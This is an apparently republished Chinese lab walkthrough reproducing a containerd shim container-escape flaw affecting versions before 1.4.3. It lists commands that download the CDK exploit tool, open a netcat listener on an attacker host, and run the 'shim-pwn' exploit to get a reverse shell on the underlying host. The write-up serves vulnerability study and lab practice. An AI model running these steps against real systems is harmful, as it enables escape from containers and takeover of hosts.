新西兰服务器
  • 电 话:400-808-5836
  • MSN :huad@live.com
  • 客服QQ:4698328 9291215
  • 咨询邮箱:sales@fobhost.com
  • 售后:services@fobhost.com
  • https://www.gaofangfuwuqi.com/
    • 首页 新闻资讯 Docker容器逃逸漏洞案例分析

    Docker容器逃逸漏洞案例分析


    Docker容器逃逸漏洞案例分析

    发布时间:2021-12-13 11:55:02 来源:高防服务器网 阅读:94 作者:iii 栏目:安全技术

    本篇内容主要讲解“Docker容器逃逸漏洞案例分析”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Docker容器逃逸漏洞案例分析”吧!

    一、漏洞介绍

    漏洞原理

    Containerd 是一个控制 runC 的守护进程,提供命令行客户端和API,用于在一个机器上管理容器。当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升,从而实现Docker容器逃逸。

    Containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。

    影响版本

    containerd < 1.4.3

    containerd < 1.3.9

    实验环境:

    被攻击机(ubuntu)ip:192.168.163.129

    被攻击机containerd版本:1.2.6

    攻击机(kali)ip:192.168.163.131

    POC下载:https://github.com/Xyntax/CDK/releases/tag/0.1.6

    二、环境介绍

    01

    被攻击机查看docker版本,显示Containerd Version : 1.2.6

    命令:docker version

    02

    为了区分被攻击机的真实环境和被攻击机的docker环境分别在/root目录下面创建不同文件

    被攻击机的docker环境:docker环境下面的/root目录下面没有文件,为了便于区分,复制一个dockerfile文件到/root目录下

    被攻击机的真实环境:真实环境下面的/root目录放置了一个true文件

    三、漏洞复现

    01

    被攻击机真实环境中列出被攻击机的容器

    命令:docker ps

    02

    被攻击机以共享主机网络的方式启动容器,并且直接进入了docker容器

    通过 –net=host 作为启动参数来运行一个容器(此处为了方便直接选择已经存在的容器vulhub/activemq:5.11.1,但是会单独再建立了一个容器,不会再下拉镜像,但是两个容器不相关)

    命令:docker run -it –net=host vulhub/activemq:5.11.1 /bin/bash

    03

    被攻击机真实环境中列出被攻击机的容器列表,刚刚我们新建的容器为container id : 4ad4f620e6a5

    命令:docker ps

    04

    在被攻击机docker容器中执行命令,可看到抽象命名空间Unix域套接字

    命令:cat /proc/net/unix|grep -a "containerd-shim"

    原理备注:containerd->containerd-shim->runc 的通信模型中,containerd-shim的接口作为abstract unix socket暴露,在docker使用–net=host参数启动、与宿主机共享net namespace时,其中的unix socket可以被容器内部访问到,容器中攻击者通过该socket可以通过API控制下游runc进程启动新的恶意镜像,并通过该镜像逃逸。

    05

    为了方便查看,被攻击机的docker环境下切换到/tmp目录下面进行操作。下载对应的poc并且进行解压操作。

    下载poc命令:wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

    解压poc命令:tar -zxvf cdk_v0.1.6_release.tar.gz

    06

    kali攻击机开启监听端口12345

    命令:nc -lvp 12345

    07

    被攻击机的docker环境中执行命令,利用poc建立起连接

    命令:./cdk_linux_386 run shim-pwn 192.168.163.131 12345

    08

    Kali攻击机成功获取了被攻击机真实环境的反弹shell(从/root目录下的文件可看出反弹的为真实主机的shell)

    备注:

    本实验存在很多注意事项(只限于本人实验过程中的坑):

    1、本来想使用vulhub的s2-032环境漏洞,利用Struts2工具远程命令执行进行docker逃逸,发现执行命令:cat /proc/net/unix|grep -a "containerd-shim"时无法看到抽象命名空间Unix域套接字,执行poc的时候显示Cannot find vulnerable socket(我使用的是docker exec -it 6970bdddacc6 /bin/bash进入的docker环境 )

    2、注意利用–net=host新建容器的时候image名字是相同的,注意区分,否则执行的命令会进入另外一个容器

    3、此利用条件是完全控制了被攻击机的docker容器的环境下执行的,利用被攻击机的docker环境控制被攻击机的真实环境。

    到此,相信大家对“Docker容器逃逸漏洞案例分析”有了更深的了解,不妨来实际操作一番吧!这里是高防服务器网网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

    [微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

    [图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
    [